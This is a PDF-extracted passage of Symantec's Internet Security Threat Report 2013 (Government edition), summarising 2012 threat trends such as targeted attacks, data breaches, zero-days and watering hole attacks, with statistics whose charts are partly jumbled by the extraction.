internet security tHreAt rePOrt GOVernMent 2013
internet security tHreAt rePOrt GOVernMent 2013
internet security tHreAt rePOrt GOVernMent 2013
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
<strong>internet</strong> <strong>security</strong> <strong>tHreAt</strong> <strong>rePOrt</strong><br />
<strong>GOVernMent</strong> <strong>2013</strong><br />
2012 Trends, Volume 18, Published April <strong>2013</strong>
p. 2<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
CONTENTS<br />
03 Introduction<br />
04 Executive Summary<br />
06 2012 Security Timeline<br />
09 2012 in Numbers<br />
13 Targeted Attacks, Hacktivism, and Data Breaches<br />
14 Introduction<br />
14 Data<br />
17 DDoS Used as a Diversion<br />
17 Data Breaches<br />
19 Analysis<br />
19 Cyberwarfare, Cybersabotage, and Industrial Espionage<br />
20 Advanced Persistent Threats and Targeted Attacks<br />
20 Social Engineering and Indirect Attacks<br />
21 Watering Hole Attacks<br />
23 Vulnerabilities, Exploits, and Toolkits<br />
24 Introduction<br />
24 Data<br />
26 Analysis<br />
26 Web-based Attacks on the Rise<br />
27 The Arms Race to Exploit New Vulnerabilities<br />
27 Malvertising and Website Hacking<br />
28 Web Attack Toolkits<br />
29 Website Malware Scanning and Website<br />
Vulnerability Assessment<br />
29 The Growth of Secured Connections<br />
29 Norton Secured Seal and Trust Marks<br />
29 Stolen Key-signing Certificates<br />
31 Social Networking, Mobile, and the Cloud<br />
32 Introduction<br />
32 Data<br />
35 Analysis<br />
35 Spam and Phishing Move to Social Media<br />
37 Mobile Threats<br />
38 Cloud Computing Risks<br />
40 Malware, Spam, and Phishing<br />
41 Introduction<br />
42 Data<br />
42 Spam<br />
45 Phishing<br />
46 Malware<br />
48 Website Exploits by Type of Website<br />
49 Analysis<br />
49 Macs Under Attack<br />
50 Rise of Ransomware<br />
51 Long-term Stealthy Malware<br />
51 Email Spam Volume Down<br />
51 Advanced Phishing<br />
53 Looking ahead<br />
56 Endnotes<br />
57 Appendix
p. 3<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
Introduction<br />
Symantec has established some of the most<br />
comprehensive sources of Internet threat<br />
data in the world through the Symantec<br />
Global Intelligence Network, which is made<br />
up of approximately 69 million attack<br />
sensors and records thousands of events<br />
per second. This network monitors threat<br />
activity in over 157 countries and territories<br />
through a combination of Symantec<br />
products and services such as Symantec<br />
DeepSight Threat Management System,<br />
Symantec Managed Security Services and<br />
Norton consumer products, and other<br />
third-party data sources.<br />
In addition, Symantec maintains one of the world’s most<br />
comprehensive vulnerability databases, currently consisting of<br />
more than 51,644 recorded vulnerabilities (spanning more than<br />
two decades) from over 16,687 vendors representing over 43,391<br />
products.<br />
Spam, phishing, and malware data is captured through a variety<br />
of sources, including the Symantec Probe Network, a system<br />
of more than 5 million decoy accounts; Symantec.cloud and<br />
a number of other Symantec <strong>security</strong> technologies. Skeptic,<br />
the Symantec.cloud proprietary heuristic technology, is able to<br />
detect new and sophisticated targeted threats before reaching<br />
customers’ networks. Over 3 billion email messages and more<br />
than 1.4 billion Web requests are processed each day across<br />
14 data centers. Symantec also gathers phishing information<br />
through an extensive antifraud community of enterprises,<br />
<strong>security</strong> vendors, and more than 50 million consumers.<br />
Symantec Trust Services provides 100 percent availability and<br />
processes over 4.5 billion Online Certificate Status Protocol<br />
(OCSP) look-ups per day, which are used for obtaining the<br />
revocation status of X.509 digital certificates around the world.<br />
These resources give Symantec’s analysts unparalleled sources<br />
of data with which to identify, analyze, and provide informed<br />
commentary on emerging trends in attacks, malicious code<br />
activity, phishing, and spam. The result is the annual Symantec<br />
Internet Security Threat Report, which gives enterprises, small<br />
businesses, and consumers the essential information to secure<br />
their systems effectively now and into the future.
p. 4<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
Executive Summary<br />
Internet <strong>security</strong> threats are a growing and unique challenge to governments and public<br />
sector organizations. First, they must protect themselves against the same threats as the<br />
business sector: malware, data theft, vandalism, and hacktivism. Then they are targets in<br />
their own right for persistent attacks, espionage, and potentially even cyber attacks. Finally,<br />
government bodies, in collaboration with the private sector, have a responsibility to protect<br />
citizens, the economy, and national infrastructure against attack by hostile governments and<br />
non-state actors such as terrorist groups, often in collaboration with the private sector.<br />
In a recent speech to business executives, 1 the U.S. Secretary of Defense summarized the<br />
threat in powerful terms:<br />
“I know that when people think of cyber<strong>security</strong> today, they worry about hackers and criminals<br />
who prowl the Internet, steal people’s identities, steal sensitive business information, steal<br />
even national <strong>security</strong> secrets. Those threats are real and they exist today. But the even<br />
greater danger – the greater danger facing us in cyberspace goes beyond crime and it goes<br />
beyond harassment. A cyber attack perpetrated by nation states [and] violent extremists<br />
groups could be as destructive as the terrorist attack on 9/11. Such a destructive cyberterrorist<br />
attack could virtually paralyze the nation.”<br />
The most important trends in 2012 were:<br />
Cyberespionage and Targeted Attacks on the Rise<br />
We saw a 42 percent increase in targeted attacks with more<br />
attacks aimed at smaller businesses, perhaps using them<br />
as a Trojan horse into their customers. This suggests that<br />
organizations need to pay attention to the <strong>security</strong> of their<br />
entire supplier ecosystem as well as their own systems.<br />
Attackers focus their attacks on junior employees just as<br />
much (if not more) as they do on executives and VIPs,<br />
often because their accounts are less well protected.<br />
Attackers continued to develop increasingly sophisticated ways<br />
to infiltrate protected systems. For example, they started using<br />
watering hole attacks, a technique where malware on infected<br />
third-party websites is used to target employees who might visit<br />
those websites. In this type of attack, attackers might infect<br />
lobby groups or policy think tanks to infect government workers<br />
who might browse their sites.<br />
Specialist Information Brokers<br />
It looks increasingly likely that specialist information brokerage<br />
businesses are the hired guns of cyberespionage. The scope and<br />
scale of attacks suggest that well-resourced organizations are<br />
able to attack dozens of targets simultaneously and continuously<br />
research new zero-day attacks and attack software.<br />
Attackers Moving Away from Email<br />
Spam rates are down 29 percent, phishing attempts are down to<br />
one in 608 emails, and one in 291 emails contains a virus. While<br />
these attacks are in relative decline, social media is a new and<br />
growing battlefield. On the face of it, social networking doesn’t<br />
appear to be a threat for the public sector but in reality it gives<br />
attackers a treasure trove of personal information for identity<br />
theft and targeted attacks. It’s also a new way to install<br />
malware on people’s computers.
p. 5<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
Ill-protected Websites Put Us at Risk<br />
We saw a threefold increase in the number of Web-based<br />
attacks. Online criminals are using different techniques<br />
to infect legitimate websites, including attack toolkits and<br />
malvertising. A line or two of code on a Web page can be very<br />
difficult to detect and it can infect thousands of visitors a day.<br />
Websites that are not well protected put other Web users at<br />
risk. As with watering hole attacks, the vulnerability of websites<br />
provides attackers with new and rapidly evolving ways to target<br />
individuals and organizations.<br />
Zero-day Vulnerabilities<br />
There were more zero-day vulnerabilities found actively being<br />
exploited in the wild than in years past. These are cases where an<br />
attack exploits a previously unknown vulnerability, as opposed<br />
to after a patch is made available by the vendor. While there were<br />
8 zero-day vulnerabilities discovered in 2011, 14 were found in<br />
2012. The rise of zero-day attacks and polymorphic malware<br />
renders moot any defense based purely on virus signature<br />
recognition; organizations need multi-layered defenses.<br />
Mac Attacks<br />
2012 was the end of the era in which Mac® computer users<br />
could plausibly claim immunity from malware. At least 600,000<br />
Mac users were infected with the Flashback threat via a Java<br />
vulnerability. Having said that, beyond this one prevalent threat,<br />
Mac threats do not appear to have increased to any great extent.<br />
While the number of unique threats targeted at the Mac are up,<br />
only about 2.5 percent of the threats targeted Mac OS; the rest<br />
targeted Windows.<br />
Data Breaches Gain Focus<br />
At first glance, the numbers for data breaches paint a picture<br />
of an attack method in decline: there were fewer high-profile<br />
attacks, and the average number of identities exposed is down<br />
significantly. Where there were 1.1 million identities exposed<br />
per breach in 2011, this number decreased by nearly half,<br />
to 604,826 in 2012. These numbers are likely down due to a<br />
concerted effort by hacker groups Anonymous and LULZSec to<br />
publicize hacks during 2011—something that was not seen to<br />
the same extent in 2012. However, the global median is up, from<br />
2,400 to 8,350 identities stolen per breach. Government agencies<br />
are particularly attractive targets for data thieves because they<br />
often hold valuable intellectual property (for example, patent<br />
offices) or personal information (for example, tax offices).<br />
The U.S. government has been warning public sector<br />
organizations for several years about the whole spectrum of<br />
Internet <strong>security</strong> threats. More recently, other governments<br />
have started addressing the issue. Governments around the<br />
world are waking up to the need to educate their constituents<br />
about <strong>security</strong> and devote resources to improving defenses.<br />
Failure threatens more than a “cyber Pearl Harbor”; it could<br />
mean a loss of economic competitiveness and long-term<br />
economic decline.
p. 6<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
2012 SECURITY TIMELINE
p. 7<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
2012 Security Timeline<br />
01<br />
January<br />
02<br />
February<br />
03<br />
March<br />
Data breach:<br />
24 million identities stolen in data breach at<br />
Zappos apparel company.<br />
Malcode:<br />
A scam involving malicious browser plug-ins for<br />
Firefox and Chrome is discovered.<br />
Botnet:<br />
Kelihos botnet returns, four months after being<br />
taken down.<br />
Mobile:<br />
Google announces Google Bouncer, an app<br />
scanner for the Google Play market.<br />
Botnet:<br />
Researchers take down new variant of the Kelihos<br />
botnet, which reappears in a new form later in<br />
the month.<br />
Hacks:<br />
Six individuals are arrested as alleged members<br />
of the hacking collective LulzSec.<br />
Botnet:<br />
Security researchers take down key servers for<br />
the Zeus botnet.<br />
Data breach:<br />
A payment processor for a number of wellknown<br />
credit card companies, including Visa and<br />
MasterCard was compromised, exposing details<br />
of 1.5 million accounts. 2<br />
Mobile:<br />
A non-malware-based scam involving the<br />
Opfake gang is found that targets iPhone users.<br />
04 April<br />
05 May<br />
06 June<br />
Mac:<br />
Over 600,000 Mac computers are infected<br />
by the OSX.Flashback Trojan through an<br />
unpatched Java exploit.<br />
Mac:<br />
A second Mac Trojan is discovered,<br />
OSX.Sabpab, which also uses Java exploits<br />
to compromise a computer.<br />
Social networking:<br />
Scammers are discovered leveraging social<br />
networks Tumblr and Pinterest.<br />
Malware:<br />
The cyberespionage threat W32.Flamer is<br />
discovered.<br />
Certificate Authorities:<br />
Comodo, a large Certificate Authority,<br />
authenticated and issued a legitimate codesigning<br />
certificate to a fictitious organization<br />
run by cybercriminals. This was not<br />
discovered until August.<br />
Data breach:<br />
LinkedIn suffers data breach, exposing millions<br />
of accounts.<br />
Malware:<br />
A Trojan by the name of Trojan.Milicenso is<br />
discovered, which causes networked printers<br />
to print large print jobs containing illegible<br />
characters.
p. 8<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
07 July<br />
08<br />
August<br />
Botnet:<br />
Security researchers disable the Grum botnet.<br />
Malware:<br />
Windows malware is discovered in Apple’s App<br />
Store, embedded in an application.<br />
Mac:<br />
A new Mac threat called OSX.Crisis opens a back<br />
door on compromised computers.<br />
Botnet:<br />
DNS servers, maintained by the FBI in order to<br />
keep computers previously infected with the<br />
DNSChanger Trojan safe, are shut off.<br />
Malware:<br />
A Trojan used to steal information from the<br />
Japanese government is discovered after<br />
being in operation for two years.<br />
Malware:<br />
A second printer-related threat called<br />
W32.Printlove, which causes large print jobs to<br />
print garbage, is discovered.<br />
Hacks:<br />
Reuters news service suffers a series of hacks<br />
resulting in fake news stories posted on its<br />
website and Twitter account.<br />
Malware:<br />
Crisis malware is discovered targeting VMware®<br />
virtual machine images.<br />
Malware:<br />
W32.Gauss is discovered. The scope of the threat<br />
is concentrated in the Middle East, in a similar<br />
way to W32.Flamer.<br />
Certificate Authorities:<br />
Comodo incident from May discovered and<br />
details published.<br />
09<br />
September<br />
10<br />
October<br />
11<br />
November<br />
12<br />
December<br />
Malware:<br />
A new version of the Blackhole attack toolkit,<br />
dubbed Blackhole 2.0, is discovered.<br />
Botnet:<br />
Security researchers disable an up-and-coming<br />
botnet known as “Nitol.”<br />
Mobile:<br />
A vulnerability is discovered in Samsung’s<br />
version of Android that allows a phone to be<br />
remotely wiped.<br />
DDoS:<br />
FBI issues warning about possible DDoS attacks<br />
against financial institutions as part of a<br />
“distraction” technique. 3<br />
Malware:<br />
A ransomware threat distributed through Skype<br />
IM is discovered.<br />
Data breach:<br />
Customer data is stolen from Barnes & Noble<br />
payment keypads.<br />
Attackers are discovered using a DDoS attack<br />
as a distraction in order to gather information<br />
that allowed them to later steal money from a<br />
targeted bank.<br />
Hacks:<br />
Burglars found using a known exploit in a brand<br />
of hotel locks to break into hotel rooms.<br />
Malware:<br />
Infostealer.Dexter Trojan horse discovered<br />
targeting point-of-sale systems.<br />
Hacks:<br />
Attackers exploit a vulnerability in Tumblr,<br />
spreading spam throughout the social network.
p. 9<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
2012 IN NUMbERS
p. 10<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
2012 IN NUMbERS<br />
2012 in Numbers<br />
Targeted<br />
Attacks Attacks<br />
in 2012 2012<br />
New Vulnerabilities<br />
2010<br />
6,253<br />
2011<br />
4,989<br />
Mobile<br />
Vulnerabilities<br />
42 % INCREASE<br />
2012<br />
5,291<br />
2010 163<br />
Average Average Number of<br />
Identities Exposed<br />
Per Breach Breach in 2012 2012<br />
604,826<br />
2012 415<br />
2011 315
p. 11<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
2012 IN NUMbERS<br />
Estimated Global Global<br />
Email Spam Per Day<br />
(in (in billions)<br />
62 89%<br />
42 75%<br />
30 69%<br />
OVERALL SPAM RATE<br />
2010<br />
2011<br />
2012<br />
% of All Spam<br />
with Dating<br />
& Sexual<br />
Overall Email Virus Rate, 1 In:<br />
2010<br />
2011<br />
2012<br />
291<br />
Overall Email Phishing Rate, 1 In:<br />
2010<br />
2011<br />
2012<br />
3 %<br />
2010<br />
15 %<br />
2011<br />
55 %<br />
2012<br />
282<br />
442<br />
414<br />
% of All Email<br />
Malware as<br />
URL URL<br />
239<br />
299<br />
24 %<br />
2010<br />
39 %<br />
2011<br />
23 %<br />
2012
p. 12<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
2012 IN NUMbERS<br />
Bot Zombies<br />
(in millions) millions)<br />
Mobile Malware<br />
Families Increase Increase<br />
2011–2012<br />
2011<br />
2010<br />
3.1<br />
2012 3.4<br />
58 %<br />
4.5<br />
New Zero-Day<br />
Vulnerabilities<br />
14 8 14<br />
2010 2011 2012<br />
Web Web Attacks<br />
Blocked Per Day<br />
2011<br />
2012<br />
190,370<br />
247,350<br />
New Unique<br />
Malicious Web Domains<br />
2010 43,000<br />
2011 55,000<br />
2012 74,000
p. 13<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
TaRgETEd aTTaCkS<br />
haCkTIVISM<br />
aNd daTa bREaChES
p. 14<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
TaRgETEd aTTaCkS, haCkTIVISM, aNd daTa bREaChES<br />
Introduction<br />
“Just as nuclear was the strategic warfare of the industrial<br />
era, cyberwarfare has become the strategic war of the<br />
information era,” says U.S. Secretary of Defense Leon Panetta. 4<br />
Cyberespionage and cybersabotage are already a reality.<br />
Outside the realm of states and their proxies, corporate spies<br />
are using increasingly advanced techniques to steal company<br />
secrets or customer data for profit. Hactivists with political and<br />
antibusiness agendas are also busy.<br />
The string of media revelations about <strong>security</strong> breaches this<br />
year suggests that the business world is just as vulnerable to<br />
attack as ever.<br />
data<br />
Targeted attacks Per day in 2012<br />
Source: Symantec<br />
250<br />
225<br />
200<br />
175<br />
150<br />
125<br />
100<br />
75<br />
50<br />
25<br />
JAN<br />
FEB<br />
MAR<br />
APR<br />
MAY<br />
JUN<br />
We witnessed one large attack in April against a single client that<br />
more than doubled the number of attacks per day for that month;<br />
and while events like this are extremely rare, we have not included<br />
it in this calculation in order to portray a more realistic outlook. This<br />
incident would have skewed the global annual average number of<br />
attacks per day from 116 to 143.<br />
JUL<br />
AUG<br />
SEP<br />
at a glance<br />
• Targeted attack global average per day: 116.<br />
• Increasing levels of industrial espionage and data theft.<br />
• More insidious targeted attacks, with new “watering hole”<br />
attacks and sophisticated social engineering.<br />
• Fewer big data breaches, but the median number of identities<br />
stolen per breach has increased by 3.5 times.<br />
OCT<br />
NOV<br />
DEC<br />
This client was a large banking organization, who had not previously<br />
been a Symantec customer, and approached Symantec for help to<br />
remove an existing infection. The infection was removed; however,<br />
a large wave of targeted attacks followed as the attackers sought to<br />
regain access, ultimately failing.
p. 15<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
TaRgETEd aTTaCkS, haCkTIVISM, aNd daTa bREaChES<br />
Top 10 Industries attacked in 2012<br />
Source: Symantec<br />
Manufacturing 24%<br />
Finance, Insurance & Real Estate 19<br />
Services – Non-Traditional 17<br />
Government 12<br />
Energy/Utilities 10<br />
Services – Professional 8<br />
Aerospace 2<br />
Retail 2<br />
Wholesale 2<br />
Transportation,<br />
Communications, Electric, Gas 1<br />
0 5 10 15 20 25%<br />
Manufacturing was the most-targeted sector in 2012, with 24 percent of targeted attacks destined for this<br />
sector, compared with 15 percent in 2011. Attacks against government and public sector organizations<br />
fell from 25 percent in 2011, when it was the most targeted sector, to 12 percent in 2012. It’s likely the<br />
frontline attacks are moving down the supply chain, particularly for small to medium-sized businesses.<br />
(Categories based on Standard Industrial Classification codes.)
p. 16<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
TaRgETEd aTTaCkS, haCkTIVISM, aNd daTa bREaChES<br />
attacks by Size of Targeted Organization<br />
Source: Symantec<br />
50% 2,501+ 50% 1 to 2,500<br />
50%<br />
50%<br />
Employees<br />
2,501+<br />
in 2011 31%<br />
Organizations with 2,501+ employees were the<br />
most targeted with 50 percent of targeted attacks<br />
destined for this size of organization, almost<br />
exactly the same percentage as in 2011.<br />
The volume of targeted attacks against<br />
organizations with 2,501+ employees doubled<br />
compared with 2011, although its overall<br />
percentage remains the same at 50 percent.<br />
50% 1 to 2,500<br />
9%<br />
2%<br />
3%<br />
5%<br />
31%<br />
18%<br />
in 2011<br />
1,501 to 2,500<br />
1,001 to 1,500<br />
501 to 1,000<br />
251 to 500<br />
1 to 250<br />
Targeted attacks destined for Small Business<br />
(1 to 250 employees) accounted for 31 percent<br />
of all attacks, compared with 18 percent in 2011,<br />
an increase of 13 percentage points.<br />
The volume of attacks against SMBs increased<br />
threefold, compared with 2011, resulting in its<br />
percentage almost doubling from 18 percent<br />
to 31 percent.
p. 17<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
TaRgETEd aTTaCkS, haCkTIVISM, aNd daTa bREaChES<br />
Targeted attack Recipients by Role in 2012<br />
Source: Symantec<br />
2011<br />
2012 % CHANGE<br />
Chief Exec. or Board Level<br />
PR and Marketing<br />
Personal Assistant<br />
Research & Development<br />
Human Resources<br />
Sales<br />
Senior Management<br />
Shared Mailbox<br />
info@, sales@, etc.<br />
DDoS Used as a Diversion<br />
-15% -10% -5 0 5 10 15 20 25 30%<br />
In September, the FBI issued a warning to financial institutions<br />
that some DDoS attacks are actually being used as a “distraction.”<br />
These attacks are launched before or after cybercriminals engage<br />
in an unauthorized transaction and are an attempt to avoid<br />
discovery of the fraud and prevent attempts to stop it.<br />
In these scenarios, attackers target a company’s website with<br />
a DDoS attack. They may or may not bring the website down,<br />
but that’s not the main focus of such an attack; the real goal is<br />
to divert the attention of the company’s IT staff towards the<br />
DDoS attack. Meanwhile, the hackers attempt to break into the<br />
company’s network using any number of other methods that may<br />
go unnoticed as the DDoS attack continues in the background. 5<br />
Data Breaches<br />
The overall number of data breaches is down by 26 percent,<br />
according to the Norton Cybercrime Index, 6 though over 93<br />
million identities were exposed during the year, a decrease of 60<br />
percent over last year. The average number of identities stolen<br />
is also down this year: at 604,826 per breach, this is significantly<br />
smaller than the 1.1 million per breach in 2011.<br />
In 2012, the most frequently<br />
targeted job role was in R&D,<br />
which accounted for 27<br />
percent of attacks (9 percent<br />
in 2011). The second most<br />
notable increase was against<br />
sales representatives, probably<br />
because their contact details<br />
are more widely available in the<br />
public domain, with 24 percent<br />
of attacks in 2012 versus 12<br />
percent in 2011. In 2011,<br />
C-level executives were the most<br />
targeted, with 25 percent, but<br />
this number fell to 17 percent<br />
in 2012.<br />
So why are the number of breaches and identities stolen down in<br />
2012? For starters, there were five attacks in which more than 10<br />
million identities were stolen in 2011. In 2012 there was only one,<br />
which results in a much smaller spread from the smallest to the<br />
largest data breach. However, the median number—the midpoint<br />
of the data set—increased by 3.5 times in 2012, from 2,400 to<br />
8,350 per breach. Using the median is a useful measure because<br />
it ignores the extremes, the rare events that resulted in large<br />
numbers of identities being exposed, and is more representative<br />
of the underlying trend.<br />
Part of the wide difference between data breaches in 2011 and<br />
2012 is likely down due to a concerted effort by the notorious<br />
hacker groups Anonymous and LulzSec to publicize hacks<br />
during 2011—something that was not seen to the same extent in<br />
2012. It’s possible that companies are paying more attention to<br />
protecting customer databases or that hackers have found other,<br />
more valuable targets, or that they are still stealing the data but<br />
not being detected.
p. 18<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
TaRgETEd aTTaCkS, haCkTIVISM, aNd daTa bREaChES<br />
Healthcare, education, and government accounted for nearly<br />
two-thirds of all identities breached in 2012. This suggests<br />
that the public sector should further increase efforts to<br />
protect personal information, particularly considering<br />
how these organizations are often looked upon as the<br />
custodians of information for the most vulnerable in society.<br />
Alternatively, this could indicate that the private sector may<br />
not be reporting all data breaches, given how many public<br />
sector organizations are required by law to report breaches.<br />
The vast majority (88 percent) of reported data breaches<br />
were due to attacks by outsiders. But it is safe to assume that<br />
unreported data breaches outnumber reported ones. Whether<br />
it is lost laptops, misplaced memory sticks, deliberate data<br />
theft by employees or accidents, the insider threat also<br />
remains high. To illustrate this point, the UK Information<br />
Commissioner’s Office fined and prosecuted more businesses<br />
because of insider slipups than because of outsider attacks.<br />
Most SMBs should worry about someone in accounts just as<br />
data breaches by Sector in 2012<br />
Source: Symantec<br />
Education<br />
16%<br />
Healthcare<br />
36%<br />
Government<br />
13%<br />
9% Accounting<br />
6% Computer Software<br />
6% Financial<br />
5% Information Technology<br />
4% Telecom<br />
3% Computer Hardware<br />
3% Community and Nonprofit<br />
much as they should worry about an anonymous hacker. At 36 percent, the healthcare industry continues to be the<br />
sector responsible for the largest percentage of disclosed<br />
data breaches by industry.<br />
Timeline of data breaches<br />
Source: Symantec<br />
January saw the largest number<br />
of identities stolen in 2012, due<br />
to one breach of over 24 million<br />
identities, while the numbers<br />
of the rest of the year mostly<br />
fluctuated between one and<br />
12 million identities stolen per<br />
month.<br />
The average number of breaches<br />
for the first half of the year was<br />
11, and rose to 15 in the second<br />
half of the year– a 44 percent<br />
increase.<br />
SUM OF IDENTITIES BREACHED (MILLIONS)<br />
35<br />
30<br />
25<br />
20<br />
15<br />
10<br />
5<br />
0<br />
JAN<br />
JAN<br />
31<br />
MILLION<br />
BREACHES IN JAN.<br />
FEB<br />
FEB<br />
MAR<br />
MAR<br />
APR<br />
APR<br />
MAY<br />
MAY<br />
JUN<br />
JUN<br />
JUL<br />
JUL<br />
AUG<br />
AUG<br />
SEP<br />
SEP<br />
OCT<br />
OCT<br />
NOV<br />
NOV<br />
DEC<br />
DEC<br />
INCIDENTS SUM<br />
35<br />
30<br />
25<br />
20<br />
15<br />
10<br />
5<br />
0<br />
NUMBER OF INCIDENTS
p. 19<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
TaRgETEd aTTaCkS, haCkTIVISM, aNd daTa bREaChES<br />
average Cost Per Capita of a data breach 7<br />
Source: Symantec<br />
Country Average Cost Per Capita<br />
u.s. $194<br />
Denmark $191<br />
France $159<br />
Australia $145<br />
Japan $132<br />
uK $124<br />
italy $102<br />
indonesia $42<br />
At US$194, the United States is the country with highest in cost<br />
per capita, with Denmark a close second at $191 per capita.<br />
analysis<br />
Cyberwarfare, Cybersabotage,<br />
and Industrial Espionage<br />
Targeted attacks have become an established part of the threat<br />
landscape and safeguarding against them has become one of<br />
the main concerns of CISOs and IT managers. Targeted attacks<br />
are commonly used for the purposes of industrial espionage to<br />
gain access to the confidential information on a compromised<br />
computer system or network. They are rare but potentially the<br />
most difficult attacks to defend against.<br />
It is difficult to attribute an attack to a specific group or a<br />
government without sufficient evidence. The motivation and<br />
the resources of the attacker sometimes hint to the possibility<br />
that the attacker could be state sponsored, but finding clear<br />
evidence is difficult. Attacks that could be state sponsored,<br />
but appear to be rare in comparison with regular cybercrime,<br />
have often gained more notoriety. They can be among the<br />
most sophisticated and damaging of these types of threats.<br />
Governments are undoubtedly devoting more resources to<br />
Top Causes of data breaches in 2012<br />
Source: Symantec<br />
0 10 20 30 40 50<br />
8 %<br />
6 %<br />
1 %<br />
Fraud<br />
23<br />
23 %<br />
Insider theft<br />
Unknown<br />
40 %<br />
Hackers<br />
% Accidentally<br />
made public<br />
Theft or loss<br />
of computer<br />
or drive<br />
Hackers continue to be responsible for the largest number of<br />
data breaches, making up 40 percent of all breaches.<br />
defensive and offensive cyberwarfare capabilities. In 2012, it<br />
was still unlikely that most businesses would encounter such<br />
an attack, and the greatest risk comes from the more prevalent<br />
targeted attacks that are created for the purposes of industrial<br />
espionage. Increasingly, small to medium-sized businesses<br />
(SMB) are finding themselves on the frontline of these targeted<br />
attacks as they have fewer resources to combat the threat<br />
and a successful attack here may subsequently be used as the<br />
springboard to further attacks against a larger organization to<br />
which they may be a supplier.<br />
Malware such as Stuxnet in 2010, Duqu in 2011, and Flamer and<br />
Disttrack in 2012 show increasing levels of sophistication and<br />
danger. For example, the malware used in the Shamoon attacks<br />
on a Saudi oil firm had the ability to wipe hard drives. 8<br />
The same techniques used by cybercriminals for industrial<br />
espionage, may also be used by states and state proxies for<br />
cyber attacks and political espionage. Sophisticated attacks may<br />
be reverse-engineered and copied so that the same or similar
p. 20<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
TaRgETEd aTTaCkS, haCkTIVISM, aNd daTa bREaChES<br />
Timeline of Targeted attacks 9<br />
Source: Symantec<br />
Ghostnet<br />
• March 2009<br />
• Large-scale<br />
Cyberspying<br />
Operation<br />
2009<br />
Hydraq<br />
• January 2010<br />
• Operation “Aurora”<br />
Stuxnet<br />
• June 2010<br />
2010<br />
RSA Attacks<br />
• August 2011<br />
techniques can be used in less discriminate attacks. A further<br />
risk is that malware developed for cybersabotage may spread<br />
beyond its intended target and infect other computers in a kind<br />
of collateral damage.<br />
Advanced Persistent Threats and Targeted Attacks<br />
Targeted attacks combine social engineering and malware to<br />
target individuals in specific companies with the objective<br />
of stealing confidential information such as trade secrets or<br />
customer data. They often use custom-written malware and<br />
sometimes exploit zero-day vulnerabilities, which makes them<br />
harder to detect and potentially more infective.<br />
Targeted attacks use a variety of vectors as their main delivery<br />
mechanism, such as malware delivered in an email, or driveby<br />
downloads from an infected website the intended recipient<br />
is known to frequent, a technique known as a ”watering hole”<br />
attack.<br />
APTs are often highly sophisticated and more insidious than<br />
traditional attacks, relying on highly customized intrusion<br />
techniques. While targeted attacks are growing increasingly<br />
more common, the resources required to launch an advanced<br />
Nitro Attacks<br />
• July–October 2011<br />
• Against Chemical<br />
Industry<br />
2011<br />
Sykipot / Taidoor<br />
Attacks<br />
• Targeting Defense<br />
Industry and<br />
Governments<br />
Flamer & Gauss<br />
• May 2012 – Aug 2012<br />
• Highly Sophisticated<br />
Threat<br />
• Targets Middle East<br />
persistent threat campaign means they are limited to wellfunded<br />
groups attacking high-value targets.<br />
Symantec saw a 42 percent increase in the targeted attack rate<br />
in 2012 compared with the preceding 12 months. While the<br />
manufacturing industry has become the main target accounting<br />
for 24 percent of attacks, we also saw a wide range of companies<br />
coming under attack, not only large businesses, but increasingly<br />
SMBs as well. In 2011, 18 percent of targeted attacks were aimed<br />
at companies with fewer than 250 employees, but by the end of<br />
2012, they accounted for 31 percent.<br />
Social Engineering and Indirect Attacks<br />
2012<br />
Elderwood Project<br />
• September 2012<br />
• Main Target: Defense.<br />
Same group identified<br />
using Hydraq (Aurora)<br />
in 2009<br />
Attackers may be targeting smaller businesses in the supply<br />
chain because they are more vulnerable, have access to<br />
important intellectual property, and offer a stepping stone<br />
into larger organizations. In addition, they are also targeted<br />
in their own right. They are more numerous than enterprises,<br />
have valuable data, and are often less well-protected than<br />
larger companies. For example, an attacker may infiltrate a<br />
small supplier in order to use it as a spring board into a larger<br />
company. They might use personal information, emails, and files<br />
from an individual in such a smaller company to create a well-
p. 21<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
TaRgETEd aTTaCkS, haCkTIVISM, aNd daTa bREaChES<br />
Web Injection Process Used in Watering hole attacks 10<br />
Source: Symantec<br />
Watering Hole Attacks<br />
1. Attacker Attacker profiles victims and<br />
the kind of of websites websites they they go to.<br />
2. Attacker Attacker then tests tests these websites<br />
for vulnerabilities.<br />
vulnerabilities.<br />
3. When the attacker finds a website<br />
that he can compromise, he injects<br />
JavaScript or HTML, redirecting the<br />
victim to a separate site that hosts the<br />
exploit code for the chosen vulnerability.<br />
4. The compromised website is<br />
now “waiting” to infect the profiled<br />
victim with a zero-day exploit,<br />
just like a lion waiting at a<br />
watering hole.<br />
crafted email aimed at someone in a target company.<br />
In 2012, we saw a big increase in attacks on people in<br />
R&D and sales roles compared to the previous year.<br />
This suggests that attackers are casting a wider net and<br />
targeting less senior positions below the executive level in<br />
order to gain access to companies. The increase in attacks<br />
has been particularly high overall in these two areas. Still,<br />
